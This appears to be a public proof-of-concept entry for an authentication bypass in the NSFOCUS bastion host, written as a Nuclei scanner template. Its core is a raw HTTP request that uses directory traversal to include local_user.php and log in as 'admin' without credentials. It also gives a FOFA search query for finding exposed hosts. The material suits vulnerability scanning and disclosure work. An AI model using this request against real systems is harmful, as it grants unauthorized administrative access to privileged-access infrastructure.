漏洞描述
Nsfocus bastion host has an arbitrary user login vulnerability. Attackers can use the vulnerability to log in any user by including www/local_user.php
nsfocus-auth-bypass: Nsfocus - Arbitrary User Login
PoC代码[已公开]
id: nsfocus-auth-bypass
info:
name: Nsfocus - Arbitrary User Login
author: ritikchaddha
severity: high
description: |
Nsfocus bastion host has an arbitrary user login vulnerability. Attackers can use the vulnerability to log in any user by including www/local_user.php
reference:
- https://forum.butian.net/article/251
metadata:
max-request: 2
verified: true
fofa-query: body="/needUsbkey.php?username=" && "NSFOCUS"
tags: nsfocus,auth-bypass,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "contains(tolower(body), 'nsfocus')"
- "contains(header, 'NSFOCUS')"
condition: or
internal: true
- raw:
- |
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'status": 200'
- type: word
part: content_type
words:
- application/json
# digest: 4a0a0047304502207764dbdfd3de1f4c55fd7c86ac35bb900f5da28465c0c33091b038811be6aaf6022100ff98ac93cb98b7ac484bc093716f02f3530f8b313969f181c3d2bb97716bfbf8:922c64590222798bb761d5b6d8e72950